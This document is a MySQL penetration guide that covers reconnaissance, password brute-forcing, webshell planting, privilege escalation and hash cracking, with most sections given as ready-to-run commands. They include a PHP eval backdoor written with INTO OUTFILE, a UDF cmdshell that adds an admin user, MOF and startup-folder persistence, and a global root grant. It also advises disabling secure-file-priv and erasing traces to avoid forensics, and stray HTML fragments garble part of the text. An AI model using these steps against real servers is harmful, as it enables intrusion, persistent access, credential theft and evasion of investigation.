Comprehensive MySQL Penetration Guide: Recon, Exploits, and Privilege Escalation

Author Chen Xiaobing, a senior engineer with over 18 years of network security experience, presents a thorough walkthrough of MySQL database penetration techniques commonly needed during web application attacks.

1. MySQL Information Gathering

Port scanning: Use tools like iisputter or nmap -p 3306 192.168.1.1-254 to detect the default 3306 port or custom ports.

Version detection: Metasploit module auxiliary/scanner/mysql/mysql_version (set rhosts then run) or simple SQL queries SELECT @@version, SELECT version(). Sqlmap can also retrieve version via sqlmap.py -u url --dbms mysql.

Database management tools: phpMyAdmin, Navicat, MySQL Front may store credentials in configuration files that can be harvested.

Metasploit enumeration: Modules auxiliary/scanner/mysql/mysql_hashdump and auxiliary/admin/mysql/mysql_enum retrieve password hashes, user lists, and directory information.

File and directory enumeration: Use auxiliary/scanner/mysql/mysql_file_enum and auxiliary/scanner/mysql/mysql_writable_dirs (note: success varies).

2. MySQL Password Acquisition

Brute‑force: Online web tools (Burp Suite, multi‑threaded phpMyAdmin crackers) and Metasploit module auxiliary/scanner/mysql/mysql_login with parameters like BLANK_PASSWORDS, BRUTEFORCE_SPEED,

PASS_FILE</{code}>.</li>
<li><strong>nmap scripts:</strong> <code>nmap --script=mysql-brute 192.168.157.130

and

nmap -sV --script=mysql-databases --script-args=mysqluser=root,mysqlpass=root 192.168.157.130

for password‑guessing and database enumeration.

Sqlmap OS‑shell: sqlmap -u url --os-shell to drop a webshell after gaining write access.

3. Webshell Acquisition

Leverage phpMyAdmin to read/write files via SELECT ... INTO OUTFILE (e.g., creating cmd.php with a PHP backdoor).

Directly write a one‑liner backdoor:

select '<?php @eval($_POST[antian365]);?>' INTO OUTFILE 'D:/work/WWW/antian365.php'

.

Use image upload tricks to embed PHP code in a JPEG and include it.

Exploit MySQL general_log to write arbitrary PHP code to a file.

Utilize CMS admin accounts (Dedecms, PHPCMS, Discuz) to upload malicious files.

4. MySQL Privilege Escalation

MOF technique: Deploy a malicious MOF file (e.g., nullevt.mof) via SELECT LOAD_FILE(...) to achieve SYSTEM level on Windows. Metasploit module exploit/windows/mysql/mysql_mof automates this.

UDF method: Upload lib_mysqludf_sys.dll to the MySQL plugin directory, create a function cmdshell, then execute commands like select cmdshell('net user iis_user 123!@#abcABC /add');. Cleanup with DROP FUNCTION cmdshell; Direct MySQL grant: Change host to '%' or grant all privileges to a new user:

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION;

Startup script injection: Export VBS or BAT files to the Windows startup folder via SELECT * FROM a INTO OUTFILE 'C:\...\Startup\a.vbs'; to create persistent admin accounts.

Msf modules: exploit/windows/mysql/mysql_payload, exploit/windows/mysql/mysql_start_up, and other auxiliary scanners for authentication bypass (CVE‑2012‑2122) and privilege escalation.

5. Password Cracking Tools

Cain & Abel: Extract MySQL hash from user.MYD and crack with dictionary or brute force.

Online hash services: cmd5.com, somd5.com for quick lookups (often paid).

Hashcat: hashcat64.exe -m 200 mysql_hash.dict for MySQL323, -m 300 for MySQL4.1/5.

John the Ripper: Use john --format=mysql-sha1 hashes.txt after preparing hash files.

6. Common Errors and Mitigations

Secure‑file‑priv prevents SELECT ... INTO OUTFILE; disable or comment the option in my.ini.

Skip‑grant‑tables disables UDFs; remove the option to enable them.

File permission issues may block DLL placement; ensure the MySQL process can write to the target directory.

All commands are presented as exact msf, nmap, sqlmap, and SQL snippets to facilitate replication in a controlled lab environment. The guide emphasizes careful cleanup: drop created functions, remove uploaded DLLs, and delete generated webshell files to avoid leaving forensic traces.